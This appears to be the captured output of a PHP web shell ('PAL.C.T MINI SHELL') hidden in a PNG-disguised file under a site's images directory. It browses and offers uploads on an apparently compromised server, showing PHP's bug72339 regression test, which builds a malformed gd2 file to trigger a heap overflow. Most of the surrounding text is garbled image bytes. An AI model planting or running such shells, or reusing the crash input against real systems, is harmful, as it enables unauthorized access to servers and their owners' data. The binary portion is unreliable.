php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/Rm19_symconf/root/php-7.1.11/ext/gd/tests/
upload
files >> /var/www/html/sub/images/Rm19_symconf/root/php-7.1.11/ext/gd/tests/bug72339.phpt

--TEST--
Bug #72339 Integer Overflow in _gd2GetHeader() resulting in heap overflow 
--SKIPIF--
<?php
if (!function_exists("imagecreatefromgd2")) print "skip";
if (!GD_BUNDLED && version_compare(GD_VERSION, '2.2.2', '<')) {
	die("skip test requires GD 2.2.2 or higher");
}
?>
--FILE--
<?php
$fname = dirname(__FILE__) . DIRECTORY_SEPARATOR . "bug72339.gd";

$fh = fopen($fname, "w");
fwrite($fh, "gd2\x00");
fwrite($fh, pack("n", 2));
fwrite($fh, pack("n", 1));
fwrite($fh, pack("n", 1));
fwrite($fh, pack("n", 0x40));
fwrite($fh, pack("n", 2));
fwrite($fh, pack("n", 0x5AA0)); // Chunks Wide
fwrite($fh, pack("n", 0x5B00)); // Chunks Vertically
fwrite($fh, str_repeat("\x41\x41\x41\x41", 0x1000000)); // overflow data
fclose($fh);

$im = imagecreatefromgd2($fname);

if ($im) {
	imagedestroy($im);
}
unlink($fname);

?>
--EXPECTF--	
Warning: imagecreatefromgd2(): gd warning: product of memory allocation multiplication would exceed INT_MAX, failing operation gracefully
 in %sbug72339.php on line %d

Warning: imagecreatefromgd2(): '%sbug72339.gd' is not a valid GD2 file in %sbug72339.php on line %d
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`